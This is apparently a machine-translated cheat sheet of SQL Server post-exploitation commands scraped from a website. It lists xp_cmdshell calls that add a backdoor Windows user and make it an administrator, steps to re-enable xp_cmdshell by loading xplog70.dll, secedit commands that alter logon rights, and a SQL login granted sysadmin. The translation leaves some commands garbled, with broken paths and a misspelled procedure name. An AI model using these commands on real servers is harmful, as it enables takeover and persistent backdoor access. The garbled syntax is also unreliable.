Source: http://neeeao.com
EXEC MASTER..XP_CMDSHELL "NET User Name Password / Add" -
; exec master..xp_cmdshell "Net localgroup administrators name / add" -
Program code to open the SQL statement of cmdshell
EXEC SP_ADDEXTENDEDPROC XP_CMDSHELL, @ DLLNAME = 'XPLOG70.DLL'
Determine if the storage extension exists
SELECT Count (*) from master.dbo.sysObjects where xtype = 'x' and name = 'xp_cmdshell'
Return the result is 1 OK
Restore xp_cmdshell
Exec master.dbo.addextendedProc 'xp_cmdshell', 'xplog70.dll'; select count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'
Return the result is 1 OK
Otherwise upload XPLog7.0.dll
Exec master.dbo.addextendedProc 'xp_cmdshell', 'c: /winnt/system32/XPLOG70.DLL'
SQL statement blocked on cmdshell
sp_dropextendedProc "XP_cmdshell"
DOS:
DIR C: /
DIR D: /
DIR E: /
NET User TsinterNetUsers Password / Add
Net localgroup administrators TsinterNetUsers / Add
Backup recovery IPsec
SECEDIT / EXPORT / CFG C: /TMP.INF
echo sedenynetworklogonright = >> c: /tmp.inf
SECEDIT / Configure / DB C: /Windows/secedit.sdb / cfg c: /tmp.inf
SQL:
EXEC MASTER..SP_ADDLOGIN UserName, Password
Exec master..mp_addsrvrolemember username, sysadmin
